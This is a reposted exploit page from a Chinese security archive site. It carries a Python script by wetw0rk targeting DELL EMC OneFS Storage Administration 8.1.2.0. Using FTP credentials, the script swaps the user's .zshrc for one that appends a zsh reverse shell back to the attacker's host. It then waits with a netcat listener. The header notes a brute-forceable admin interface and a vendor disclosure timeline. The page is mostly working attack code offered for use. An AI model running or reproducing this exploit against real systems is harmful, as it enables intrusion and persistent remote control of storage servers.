首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DELL EMC OneFS Storage Administration 8.1.2.0 .zshrc Overwrite
来源:https://github.com/wetw0rk 作者:wetw0rk 发布时间:2018-10-11  
#!/usr/bin/env python
#
# Exploit name      : isilon-onefs-brute.py
# Created date      : 9/21/18
# Submit Date       : 10/10/18
# Author            : wetw0rk
# Python version    : 2.7
# Brute Force Script: https://github.com/wetw0rk/Exploit-Development/blob/master/DELL%20EMC%20OneFS%20Storage%20Administration%20%3C%208.1.2.0/isilon-onefs-brute.py 
# Vendor Homepage   : https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm
# Software Link     : https://downloads.emc.com/emc-com/usa/Isilon/EMC_Isilon_OneFS_8.1.2.0_Simulator.zip
# Tested on         : DELL EMC OneFS Storage Administration 8.1.2.0
#
# Greetz: Hima (thanks for helping me think of .bashrc), Fr13ndzSec, AbeSnowman, Berserk, Neil
#
# [------------ Timeline ------------]
#   9/21/18 - Contacted Dell PSIRT
#   9/25/18 - Sent POC code
#   10/9/18 - Responded with "not considered a vulnerability"
#
# Description :
#   To exploit this vulnerability first you must gain access to the administrative
#   interface on 8080 (note no lockouts so you can bruteforce E Z). Once in enable
#   FTP like so:
#     -> Protocols -> FTP Settings -> Enable the service and transfers -> With that done, exploit!
#
#   Since you're dropped in the user home directory and not a secluded FTP directory
#   you can inject into .zshrc, however as dell stated you can access other files on
#   the system as well....
#

import os
import sys
import socket
import threading

RED = "\033[1m\033[31m[-]\033[0m"
BLUE = "\033[1m\033[94m[*]\033[0m"
GREEN = "\033[1m\033[92m[+]\033[0m"

def background_server(lhost):
    global check

    fd = open(".zshrc", 'w')

    host = "0.0.0.0"
    port = 50121
    sock = socket.socket(
        socket.AF_INET,
        socket.SOCK_STREAM
    )
    sock.bind((host, port))
    sock.listen(5)

    print("%s listening on %s:%s" % (BLUE, host,port))
    while True:
        conn, addr = sock.accept()
        if check != 1:
            zshrc_file = conn.recv(4096)
            print("%s generating .zshrc payload" % BLUE)
            fd.write(zshrc_file)
            # msfvenom -a cmd --platform unix -p cmd/unix/reverse_zsh LHOST=192.168.245.136 LPORT=443 -f raw
            fd.write("zsh -c 'zmodload zsh/net/tcp && ztcp %s 443 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY' &\n" % lhost)
            fd.close()
        else:
            with open('.zshrc', 'r') as myfile:
                data=myfile.read()
            conn.send(data)

try:
    rhost = sys.argv[1]
    rport = int(sys.argv[2])
    lhost = sys.argv[3]
    username = sys.argv[4]
    password = sys.argv[5]
except:
    print("Usage: ./%s <rhost> <rport> <lhost> <username> <password>" % sys.argv[0])
    print("Example: ./%s 192.168.245.3 21 192.168.245.136 admin admin" % sys.argv[0])
    exit(0)

check = 0 # start a background server for download+uploads
server_thread = threading.Thread(target=background_server, args=(lhost,))
server_thread.start()

# create a socket for the client sending the commands
print("%s connecting to %s:%s" % (BLUE, rhost, rport))
csock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
csock.connect((rhost, rport))
csock.recv(4096)
print("%s performing login to OneFS using %s:%s" % (BLUE, username, password))
csock.send("USER %s\r\n" % username)
csock.recv(4096)
csock.send("PASS %s\r\n" % password)
csock.recv(4096)
print("%s login was successful downloading .zshrc" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("RETR .zshrc\r\n")
csock.recv(4096)
csock.send("RNFR .zshrc\r\n")
csock.recv(4096)
print("%s renaming remote .zshrc to .backup" % GREEN)
csock.send("RNTO .backup\r\n")
csock.recv(4096)
check = 1
print("%s uploading payload to target host" % GREEN)
csock.send("PORT %s,195,201\r\n" % lhost.replace(".", ",")) # have port on 50121
csock.recv(4096)
csock.send("TYPE I\r\n")
csock.recv(4096)
csock.send("STOR .zshrc\r\n")
print("%s exploitation complete waiting for %s to login" % (GREEN, username))
os.system("nc -lvp 443")
csock.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Delta Electronics Delta Indust
·VLC Media Player 2.2.8 MKV Use
·MicroTik RouterOS < 6.43rc3 -
·FileZilla 3.33 - Buffer Overfl
·Microsoft Edge Chakra JIT - Ty
·Microsoft Edge Chakra JIT - 'B
·Free MP3 CD Ripper 2.8 - '.wma
·Delta Electronics Delta Indust
·ifwatchd Privilege Escalation
·Linux - Kernel Pointer Leak vi
·Cisco Prime Infrastructure - U
·Linux Kernel < 4.11.8 - 'mq_no
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved